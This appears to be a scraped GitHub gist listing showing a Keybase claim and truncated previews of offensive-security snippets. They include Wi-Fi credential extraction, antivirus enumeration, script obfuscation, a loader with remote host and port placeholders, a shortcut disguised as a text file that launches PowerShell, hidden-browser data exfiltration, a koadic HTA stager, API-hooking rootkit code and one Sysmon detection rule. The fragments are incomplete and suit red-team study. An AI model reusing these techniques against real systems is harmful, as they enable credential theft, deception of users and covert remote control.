I hereby claim:
- I am leoloobeek on github.
- I am leoloobeek (https://keybase.io/leoloobeek) on keybase.
- I have a public key ASCyIsv1dP110VtA9CuMQ7YPLZ758Seyi8O5hu_ww7ZDVgo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#====================================# | |
# Extract Wi-Fi Credentials # | |
# greg . foss @ owasp . org # | |
# v0.1 -- July, 2017 # | |
#====================================# | |
# Licensed under the MIT License | |
<# |
Function Base64Encode(sText) | |
dim DM, EL | |
Set DM = CreateObject("Microsoft.XMLDOM") | |
Set EL = DM.createElement("tmp") | |
EL.DataType = "bin.base64" | |
EL.NodeTypedValue = sText | |
Base64Encode = EL.Text | |
End Function | |
Set wmiObj=GetObject("winmgmts:{impersonationLevel=impersonate}\\.\ROOT\SecurityCenter2") | |
Set items = wmiObj.ExecQuery("Select * from AntiVirusProduct") |
Option Explicit | |
dim oEncoder, oFilesToEncode, file, sDest | |
dim sFileOut, oFile, oEncFile, oFSO, i | |
dim oStream, sSourceFile | |
set oFilesToEncode = WScript.Arguments | |
set oEncoder = CreateObject("Scripting.Encoder") | |
For i = 0 to oFilesToEncode.Count - 1 | |
set oFSO = CreateObject("Scripting.FileSystemObject") |
Call X() | |
End Function | |
Dim RHOST: RHOST = "x.x.x.x" | |
Dim RPORT: RPORT = "8999" | |
Function Base64ToStream(b) | |
Dim enc, length, ba, transform, ms | |
Set enc = CreateObject("System.Text.ASCIIEncoding") | |
length = enc.GetByteCount_2(b) |
$Shell = New-Object -ComObject ("WScript.Shell") | |
$ShortCut = $Shell.CreateShortcut($env:USERPROFILE + "\Desktop\MaliciousLink.lnk") | |
$ShortCut.Arguments = " -W 1 -command ....." | |
$ShortCut.TargetPath = "powershell" | |
$ShortCut.IconLocation = "C:\Windows\System32\notepad.exe, 0"; | |
$ShortCut.Description = "Type: Text Document"; | |
$ShortCut.Save() |
// sample function that takes in a destination server, POST data, and custom HTTP request headers | |
private string SendData(string dst, byte[] postData, string customHeaders) | |
{ | |
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046")); | |
object IE = Activator.CreateInstance(com_type); | |
object[] falseArr = new object[] { false }; | |
object[] trueArr = new object[] { true }; | |
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr); | |
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr); |
<html> | |
<head> | |
<script language="JScript"> | |
// HTA skeleton taken from https://github.com/zerosum0x0/koadic | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try | |
{ |
<!--SYSMON EVENT ID 7 : DLL (IMAGE) LOADED BY PROCESS--> | |
<!--DATA: UtcTime, ProcessGuid, ProcessId, Image, ImageLoaded, Hashes, Signed, Signature, SignatureStatus--> | |
<ImageLoad onmatch="include"> | |
<ImageLoaded condition="end with">ieproxy.dll</ImageLoaded> | |
</ImageLoad> | |
<ImageLoad onmatch="exclude"> | |
<Image condition="is">C:\Program Files (x86)\Internet Explorer\iexplore.exe</Image> | |
<Image condition="is">C:\Program Files\internet explorer\iexplore.exe</Image> | |
<Image condition="is">C:\Program Files (x86)\Internet Explorer\ielowutil.exe</Image> | |
<Image condition="is">C:\Program Files\internet explorer\ielowutil.exe</Image> |
#include <windows.h> | |
#include <stdio.h> | |
FARPROC fpCreateProcessW; | |
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |